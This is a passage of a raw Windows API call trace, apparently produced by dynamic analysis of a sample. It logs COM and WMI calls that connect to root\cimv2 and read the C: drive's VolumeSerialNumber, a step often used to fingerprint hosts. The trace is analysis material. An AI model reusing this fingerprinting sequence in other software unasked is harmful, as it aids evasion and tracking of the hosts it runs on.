[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.114] WbemDefPath:IUnknown:Release (This=0xbe2460) returned 0x3 [0195.114] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0195.114] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0195.114] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0195.114] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x1 [0195.114] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0195.114] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0195.114] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030630, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030630) returned 0x0 [0195.115] WbemDefPath:IUnknown:AddRef (This=0x6030630) returned 0x3 [0195.115] WbemDefPath:IUnknown:Release (This=0x6030630) returned 0x2 [0195.115] WbemDefPath:IWbemPath:SetText (This=0x6030630, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030630, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030630, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030630, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0195.115] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.115] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0195.115] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0195.115] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0195.115] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.116] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x60278a0) returned 0x0 [0195.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x60278a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0195.116] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60278a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030940) returned 0x0 [0195.116] WbemDefPath:IUnknown:Release (This=0x60278a0) returned 0x0 [0195.116] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030940) returned 0x0 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0195.117] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbe2580) returned 0x0 [0195.117] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2580, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.117] WbemDefPath:IUnknown:Release (This=0xbe2580) returned 0x3 [0195.117] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0195.117] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0195.117] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0195.117] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x1 [0195.117] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0195.117] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0195.117] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030940, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030940) returned 0x0 [0195.117] WbemDefPath:IUnknown:AddRef (This=0x6030940) returned 0x3 [0195.117] WbemDefPath:IUnknown:Release (This=0x6030940) returned 0x2 [0195.117] WbemDefPath:IWbemPath:SetText (This=0x6030940, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0195.118] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0195.118] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0195.118] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.118] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0195.118] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0195.118] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0195.118] IUnknown:Release (This=0xb51e34) returned 0x1 [0195.119] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023d20) returned 0x0 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0195.119] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60278b0) returned 0x0 [0195.119] WbemLocator:IUnknown:Release (This=0x6023d20) returned 0x0 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60278b0) returned 0x0 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0195.119] WbemLocator:IUnknown:AddRef (This=0x60278b0) returned 0x3 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0195.119] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0195.119] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0195.119] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0195.119] WbemLocator:IUnknown:Release (This=0x60278b0) returned 0x2 [0195.120] WbemLocator:IUnknown:Release (This=0x60278b0) returned 0x1 [0195.120] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0195.120] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0195.120] WbemLocator:IUnknown:QueryInterface (in: This=0x60278b0, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x60278b0) returned 0x0 [0195.120] WbemLocator:IUnknown:AddRef (This=0x60278b0) returned 0x3 [0195.120] WbemLocator:IUnknown:Release (This=0x60278b0) returned 0x2 [0195.120] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0195.120] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0195.120] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0195.120] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x60278c0) returned 0x0 [0195.120] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60278c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x603352c) returned 0x0 [0195.817] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5b044) returned 0x0 [0195.817] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b044, pProxy=0x603352c, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0195.817] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x1 [0195.817] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5b064) returned 0x0 [0195.817] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5b044) returned 0x0 [0195.817] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b044, pProxy=0x603352c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0195.817] WbemLocator:IUnknown:Release (This=0xb5b044) returned 0x2 [0195.817] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x1 [0195.817] CoTaskMemFree (pv=0xbd4858) [0195.817] WbemLocator:IUnknown:Release (This=0x60278c0) returned 0x0 [0195.817] WbemLocator:IUnknown:QueryInterface (in: This=0x603352c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5b064) returned 0x0 [0195.817] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0195.818] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0195.818] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0195.818] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0195.818] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0195.819] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5afc4) returned 0x0 [0195.819] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5afc4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0195.819] WbemLocator:IUnknown:Release (This=0xb5afc4) returned 0x3 [0195.819] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0195.819] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0195.819] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5b04c) returned 0x0 [0195.819] WbemLocator:IRpcOptions:Query (in: This=0xb5b04c, pPrx=0xb5b064, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0195.819] WbemLocator:IUnknown:Release (This=0xb5b04c) returned 0x3 [0195.819] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0195.819] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0195.819] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0195.819] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x603352c) returned 0x0 [0195.819] WbemLocator:IUnknown:AddRef (This=0x603352c) returned 0x4 [0195.819] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x3 [0195.819] WbemLocator:IUnknown:Release (This=0x603352c) returned 0x2 [0195.819] SysStringLen (param_1=0x0) returned 0x0 [0195.819] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030630, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0195.819] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0195.819] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.819] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0195.819] WbemLocator:IUnknown:AddRef (This=0xb5b064) returned 0x3 [0195.819] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b064, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5b064) returned 0x0 [0195.819] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x3 [0195.819] WbemLocator:IUnknown:Release (This=0xb5b064) returned 0x2 [0195.820] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0195.820] WbemDefPath:IWbemPath:GetText (in: This=0x6030630, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0195.820] IWbemServices:GetObject (in: This=0x603352c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0196.136] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030940, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0196.137] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0196.137] WbemDefPath:IWbemPath:GetText (in: This=0x6030940, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0196.137] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36a8f7c*=0, plFlavor=0x36a8f80*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x36a8f7c*=8, plFlavor=0x36a8f80*=0) returned 0x0 [0196.137] 